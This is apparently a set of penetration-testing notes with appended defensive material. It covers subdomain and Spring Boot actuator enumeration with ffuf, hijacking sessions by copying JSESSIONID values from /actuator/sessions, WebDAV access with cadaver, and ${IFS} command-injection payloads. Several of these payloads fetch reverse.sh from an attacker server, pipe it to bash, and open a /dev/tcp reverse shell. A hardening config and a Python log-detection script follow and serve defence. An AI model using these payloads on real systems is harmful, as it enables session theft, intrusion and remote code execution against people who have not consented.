- robots.txt
- sitemap.xml
# Command : ffuf -w <wordlist> -u http://<host>.fr/ -H 'Host: FUZZ.<host>.fr' -fs 15949
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomainstop100000.txt -u http://mywebsite.fr/ -H 'Host: FUZZ.mywebsite.fr' -fs 15949
Request a random page that does not exist, for example /qmdkgjrot12dfgg. If the error page returns "Whitelabel Error Page", the application is built on the Spring Boot framework.
| Endpoint | Description |
|---|---|
| /actuator | |
| /actuator/sessions | Lists all the active sessions and their session ids |
| /actuator/beans | |
| /actuator/health | |
| /actuator/env | |
| /actuator/mappings | Provides a detailed overview of all the mappings configured in the application. Browsing to the endpoint returns a JSON response describing the request mappings in place, including the request methods (GET, POST, etc.) |
Known Spring Boot-specific wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://mywebsite.com/FFUZ -ic -t 10
We see the session identifier, which we can grab and set as a cookie in our browser using the developer console's Storage tab.
Important note: Firefox sometimes does not allow adding the cookie directly; in that case, try adding it to local storage or session storage instead. Also remember to name it JSESSIONID.
Once the session identifier is set, try to access the authenticated user or admin pages (e.g. /admin, /console, etc.).
Important note: Sometimes the session identifier has expired. In that case, reload the /actuator/sessions page, take a new session identifier, then update it in the developer console's Storage tab.
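The session hijack above only works because sensitive actuator endpoints are reachable over the web. As an added example (not configuration from the page or from any project it describes), here is a Spring Boot application.properties fragment showing the weak setting beside a hardened one; the property names are real Spring Boot management properties, the port and address values are assumed for illustration:

```properties
# Weak: every actuator endpoint (sessions, env, beans, mappings, ...) is exposed over HTTP
management.endpoints.web.exposure.include=*

# Hardened: expose only health, explicitly exclude the sensitive endpoints,
# hide health details from unauthenticated callers and bind the management
# port to localhost so it is not reachable from the application's public interface
management.endpoints.web.exposure.include=health
management.endpoints.web.exposure.exclude=env,sessions,beans,mappings
management.endpoint.health.show-details=never
management.server.port=8081
management.server.address=127.0.0.1
```

With the hardened block in place, a request to /actuator/sessions on the public port returns 404, which is what a detection rule for actuator probing should treat as the expected baseline; any 200 on that path is worth an alert.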
Nmap scan report for 10.0.0.1
Host is up, received user-set (0.085s latency).
Scanned at 2022-07-17 10:38:57 PDT for 344s
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Sun, 17 Jul 2022 17:43:57 GMT
|_ Server Type: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
cadaver http://10.0.0.1
username : kiosec
password:
dav:>
Often the field does not accept white spaces, so to bypass this we can use ${IFS} as a delimiter, which is a special shell variable that stands for Internal Field Separator and defaults to a space (followed by a tab and a newline) in shells like Bash and sh.
Example of command injection using ${IFS} as a delimiter.
# Remember to run 'python -m http.server 4444' on the attacker side first
test;curl${IFS}http://10.0.0.1:4444; => tries to connect to the attacker server
test;curl${IFS}http://10.10.0.1:4444/reverse.sh|bash; => tries to connect to the attacker server, download a reverse shell (reverse.sh), then execute it with bash.
# Example of reverse shell generation in the shell
#echo -e '#!/bin/bash\nsh -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > reverse.sh
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.0.0.1/4449 0>&1' > reverse.sh
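From the defender's side, the three techniques in these notes (probing sensitive /actuator endpoints, risky WebDAV methods such as those nmap flagged, and ${IFS}-based command injection) all leave recognisable traces in web server access logs. The following Python script is an added example, not code from the page or any tool it mentions; it parses a few constructed access-log lines in the combined log format, URL-decodes the request path, and reports which of the three rules each line trips. The log lines, IP addresses and the /ping?host= parameter are all constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2022:10:40:01 -0700] "GET /actuator/sessions HTTP/1.1" 200 812
10.0.0.5 - - [17/Jul/2022:10:40:02 -0700] "GET /actuator/health HTTP/1.1" 200 15
10.0.0.7 - - [17/Jul/2022:10:41:10 -0700] "PROPFIND /webdav/ HTTP/1.1" 207 1203
10.0.0.7 - - [17/Jul/2022:10:41:12 -0700] "PUT /webdav/test.txt HTTP/1.1" 201 0
10.0.0.9 - - [17/Jul/2022:10:42:30 -0700] "GET /ping?host=test;curl%24%7BIFS%7Dhttp://10.0.0.1:4444 HTTP/1.1" 500 0
10.0.0.9 - - [17/Jul/2022:10:42:31 -0700] "GET /ping?host=10.0.0.2 HTTP/1.1" 200 64
"""

# ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Methods nmap's http-methods script reported as "potentially risky" on the IIS/WebDAV host.
RISKY_METHODS = {"TRACE", "COPY", "PROPFIND", "DELETE", "MOVE", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "PUT"}

# ${IFS} / $IFS used as a whitespace substitute, plus the usual command separators.
INJECTION_RE = re.compile(r"\$\{?IFS\}?|[;|`]|\$\(|&&")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Decode once so %24%7BIFS%7D becomes ${IFS} before the rules run.
    entry["decoded_path"] = unquote(entry["path"])
    return entry


def classify(entry):
    """Return the names of the detection rules a parsed entry trips (possibly empty)."""
    hits = []
    path = entry["decoded_path"]
    route = path.split("?", 1)[0]
    # Any actuator endpoint other than health is sensitive (sessions, env, beans, mappings, ...).
    if route.startswith("/actuator") and route != "/actuator/health":
        hits.append("actuator-sensitive-endpoint")
    if entry["method"] in RISKY_METHODS:
        hits.append("webdav-risky-method")
    if INJECTION_RE.search(path):
        hits.append("command-injection-pattern")
    return hits


def analyze(log_text):
    """Run every rule over every line; return (ip, rule, method, decoded path) tuples."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in classify(entry):
            findings.append((entry["ip"], rule, entry["method"], entry["decoded_path"]))
    return findings


if __name__ == "__main__":
    for ip, rule, method, path in analyze(SAMPLE_LOG):
        print(f"{ip:<10} {rule:<30} {method} {path}")
```

Run against the constructed sample, the script flags four of the six lines: the /actuator/sessions read, the PROPFIND and PUT requests, and the ping request whose host parameter decodes to `test;curl${IFS}...`. The plain /actuator/health and the well-formed host value pass. Decoding before matching matters: an encoded `%24%7BIFS%7D` would otherwise slip past a rule that only looks for the literal `${IFS}`.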